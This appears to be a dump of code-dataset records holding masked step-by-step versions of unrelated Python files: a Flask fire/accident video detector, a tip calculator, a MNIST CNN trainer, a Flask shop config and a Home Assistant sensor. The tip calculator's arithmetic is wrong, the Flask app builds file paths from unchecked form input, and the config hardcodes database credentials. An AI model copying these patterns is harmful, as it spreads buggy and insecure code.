cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-4": "from tensorflow.keras.models import load_model\nfrom collections import deque\nimport numpy as np\nimport argparse\nfrom mail import sendmail\nimport pickle\nimport imutils\nimport cv2\nimport datetime\nimport time\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n",
"step-5": "# USAGE\n# python predict_video.py --model model/activity.model --label-bin model/lb.pickle --input example_clips/lifting.mp4 --output output/lifting_128avg.avi --size 128\n# python predict_video.py --model model/road_activity.model --label-bin model/rd.pickle --input example_clips/fire_footage.mp4 --ou\n# tput output/fire_footage2.avi --size 128\n\n# import the necessary packages\nfrom tensorflow.keras.models import load_model\nfrom collections import deque\nimport numpy as np\nimport argparse\nfrom mail import sendmail\nimport pickle\nimport imutils\nimport cv2\nimport datetime\nimport time\nfrom flask import Flask, render_template, request\n\n\napp = Flask(__name__)\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n #MODEL_PATH = 'model/real_time.model'\n #PICKLE_PATH = 'model/real_time.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/'+request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n\n print(MODEL_PATH,PICKLE_PATH,INPUT_VIDEO,OUTPUT_VIDEO,SIZE)\n #load the trained model and label binarizer from disk\n print(\"[INFO] loading model and label binarizer...\")\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, \"rb\").read())\n\n # initialize the image mean for mean subtraction along with the\n # predictions queue\n mean = np.array([123.68, 116.779, 103.939][::1], dtype=\"float32\")\n Q = deque(maxlen=SIZE)\n\n # initialize the video stream, pointer to output video file, and\n # frame dimensions\n vs = cv2.VideoCapture(INPUT_VIDEO)\n #vs = cv2.VideoCapture(0)\n writer = None\n (W, H) = (None, None)\n\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = \"\"\n que = deque()\n # loop over frames from the video file stream\n while True:\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n count += 1.0\n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n\n # if the frame dimensions are empty, grab them\n if W is None or H is None:\n (H, W) = frame.shape[:2]\n\n # clone the output frame, then convert it from BGR to RGB\n # ordering, resize the frame to a fixed 224x224, and then\n # perform mean subtraction\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype(\"float32\")\n frame -= mean\n\n # make predictions on the frame and then update the predictions\n # queue\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n # perform prediction averaging over the current history of\n # previous predictions\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count(\"fire\") + que.count(\"accident\")\n if que.count(\"fire\") > que.count(\"accident\"):\n caseDetect = \"fire\"\n else:\n caseDetect = \"accident\"\n # draw the activity on the output frame\n text = \"Alert!!: {}\".format(label)\n\n # Changes starts here\n alert = [\"fire\", \"accident\"]\n\n #currentFrame = 0\n #print(label, flag)\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n else:\n if flag == 1:\n end_frame = count - 10\n flag = 2\n\n #name = './frame/frame'+str(currentFrame)+'.jpg'\n #cv2.imwrite(name,output)\n\n # check if the video writer is None\n if writer is None:\n # initialize our video writer\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30,\n (W, H), True)\n\n # write the output frame to disk\n writer.write(output)\n\n # show the output image\n cv2.imshow(\"Output\", output)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n # changes made here\n\n if annotation != \"\":\n status = sendmail(\"[email protected]\", \"Anomaly Detected!!!\", \"yes\")\n status = status['email_status']\n\n #total_time = end_time - start_time\n #print(\"Time is: {}\".format(str(datetime.timedelta(seconds=(total_time)))))\n print(\"count: {}\".format(count))\n #print(\"Frame count: {}\".format(f_start))\n # release the file pointers\n print(\"[INFO] cleaning up...\")\n writer.release()\n vs.release()\n start_frame = start_frame//30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count, start_time=start_frame, end_time=end_frame,\n status = status)\n\n\nif __name__ == '__main__':\n app.run(debug=False)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# Tip Calculator
# Dan Soloha
# 9/12/2019
total = int(input("What was the total your bill came to? "))
print(f"With a total of {total}, you should tip ${int(total + (total * 0.15))}. If the waiter did a really good job, you should tip ${int(total + (total * 0.20))}. ") # Multiplying by 1.x was returning the number rounded down for some reason
|
normal
|
{
"blob_id": "45d5c75a993ff50e1a88510bdb16e963403c5356",
"index": 8588,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n f'With a total of {total}, you should tip ${int(total + total * 0.15)}. If the waiter did a really good job, you should tip ${int(total + total * 0.2)}. '\n )\n",
"step-3": "total = int(input('What was the total your bill came to? '))\nprint(\n f'With a total of {total}, you should tip ${int(total + total * 0.15)}. If the waiter did a really good job, you should tip ${int(total + total * 0.2)}. '\n )\n",
"step-4": "# Tip Calculator\r\n# Dan Soloha\r\n# 9/12/2019\r\n\r\ntotal = int(input(\"What was the total your bill came to? \"))\r\nprint(f\"With a total of {total}, you should tip ${int(total + (total * 0.15))}. If the waiter did a really good job, you should tip ${int(total + (total * 0.20))}. \") # Multiplying by 1.x was returning the number rounded down for some reason",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 24 12:16:15 2020
@author: zhangjuefei
"""
import sys
sys.path.append('../..')
import numpy as np
from sklearn.datasets import fetch_openml
from sklearn.preprocessing import OneHotEncoder
import matrixslow as ms
# 加载MNIST数据集,取一部分样本并归一化
X, y = fetch_openml('mnist_784', version=1, return_X_y=True)
X, y = X[:1000] / 255, y.astype(np.int)[:1000]
# 将整数形式的标签转换成One-Hot编码
oh = OneHotEncoder(sparse=False)
one_hot_label = oh.fit_transform(y.values.reshape(-1, 1))
# 输入图像尺寸
img_shape = (28, 28)
# 输入图像
x = ms.core.Variable(img_shape, init=False, trainable=False)
# One-Hot标签
one_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)
# 第一卷积层
conv1 = ms.layer.conv([x], img_shape, 3, (5, 5), "ReLU")
# 第一池化层
pooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))
# 第二卷积层
conv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), "ReLU")
# 第二池化层
pooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))
# 全连接层
fc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, "ReLU")
# 输出层
output = ms.layer.fc(fc1, 120, 10, "None")
# 分类概率
predict = ms.ops.SoftMax(output)
# 交叉熵损失
loss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)
# 学习率
learning_rate = 0.005
# 优化器
optimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)
# 批大小
batch_size = 32
# 训练
for epoch in range(60):
batch_count = 0
for i in range(len(X)):
feature = np.mat(X.values[i]).reshape(img_shape)
label = np.mat(one_hot_label[i]).T
x.set_value(feature)
one_hot.set_value(label)
optimizer.one_step()
batch_count += 1
if batch_count >= batch_size:
print("epoch: {:d}, iteration: {:d}, loss: {:.3f}".format(epoch + 1, i + 1, loss.value[0, 0]))
optimizer.update()
batch_count = 0
pred = []
for i in range(len(X)):
feature = np.mat(X[i]).reshape(img_shape)
x.set_value(feature)
predict.forward()
pred.append(predict.value.A.ravel())
pred = np.array(pred).argmax(axis=1)
accuracy = (y == pred).astype(np.int).sum() / len(X)
print("epoch: {:d}, accuracy: {:.3f}".format(epoch + 1, accuracy))
|
normal
|
{
"blob_id": "63f155f7da958e9b6865007c701f7cf986b0cbac",
"index": 7800,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../..')\n<mask token>\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-3": "<mask token>\nsys.path.append('../..')\n<mask token>\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\nimg_shape = 28, 28\nx = ms.core.Variable(img_shape, init=False, trainable=False)\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), 'ReLU')\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), 'ReLU')\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, 'ReLU')\noutput = ms.layer.fc(fc1, 120, 10, 'None')\npredict = ms.ops.SoftMax(output)\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)\nlearning_rate = 0.005\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\nbatch_size = 32\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-4": "<mask token>\nimport sys\nsys.path.append('../..')\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.preprocessing import OneHotEncoder\nimport matrixslow as ms\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\nimg_shape = 28, 28\nx = ms.core.Variable(img_shape, init=False, trainable=False)\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), 'ReLU')\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), 'ReLU')\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, 'ReLU')\noutput = ms.layer.fc(fc1, 120, 10, 'None')\npredict = ms.ops.SoftMax(output)\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)\nlearning_rate = 0.005\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\nbatch_size = 32\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 12:16:15 2020\n\n@author: zhangjuefei\n\"\"\"\n\nimport sys\nsys.path.append('../..')\n\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.preprocessing import OneHotEncoder\nimport matrixslow as ms\n\n# 加载MNIST数据集,取一部分样本并归一化\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\n\n# 将整数形式的标签转换成One-Hot编码\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\n\n# 输入图像尺寸\nimg_shape = (28, 28)\n\n# 输入图像\nx = ms.core.Variable(img_shape, init=False, trainable=False)\n\n# One-Hot标签\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\n\n# 第一卷积层\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), \"ReLU\")\n\n# 第一池化层\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\n\n# 第二卷积层\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), \"ReLU\")\n\n# 第二池化层\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\n\n# 全连接层\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, \"ReLU\")\n\n# 输出层\noutput = ms.layer.fc(fc1, 120, 10, \"None\")\n\n# 分类概率\npredict = ms.ops.SoftMax(output)\n\n# 交叉熵损失\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)\n\n# 学习率\nlearning_rate = 0.005\n\n# 优化器\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\n\n# 批大小\nbatch_size = 32\n\n# 训练\nfor epoch in range(60):\n \n batch_count = 0\n \n for i in range(len(X)):\n \n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n \n x.set_value(feature)\n one_hot.set_value(label)\n \n\n optimizer.one_step()\n \n\n batch_count += 1\n if batch_count >= batch_size:\n \n print(\"epoch: {:d}, iteration: {:d}, loss: {:.3f}\".format(epoch + 1, i + 1, loss.value[0, 0]))\n\n optimizer.update()\n batch_count = 0\n \n\n pred = []\n for i in range(len(X)):\n \n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n \n predict.forward()\n pred.append(predict.value.A.ravel())\n \n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n \n print(\"epoch: {:d}, accuracy: {:.3f}\".format(epoch + 1, accuracy))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
SQLALCHEMY_TRACK_MODIFICATIONS = False
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = (
f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
<|reserved_special_token_1|>
import os
from datetime import timedelta
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
SQLALCHEMY_TRACK_MODIFICATIONS = False
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = (
f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
<|reserved_special_token_1|>
import os
from datetime import timedelta
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
# SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(
# os.path.join(ROOT_PATH, 's_shop_flask.db'))
SQLALCHEMY_TRACK_MODIFICATIONS = False
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}'
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
# 图片上传路径
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
|
flexible
|
{
"blob_id": "3908d303d0e41677aae332fbdbe9b681bffe5391",
"index": 1044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\nSQLALCHEMY_DATABASE_URI = (\n f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-3": "import os\nfrom datetime import timedelta\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\nSQLALCHEMY_DATABASE_URI = (\n f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-4": "import os\nfrom datetime import timedelta\n\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\n\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\n# SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(\n# os.path.join(ROOT_PATH, 's_shop_flask.db'))\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\n\nSQLALCHEMY_DATABASE_URI = f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}'\n\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\n\n# 图片上传路径\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class abelectronicsiopiBinarySensor(BinarySensorEntity):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
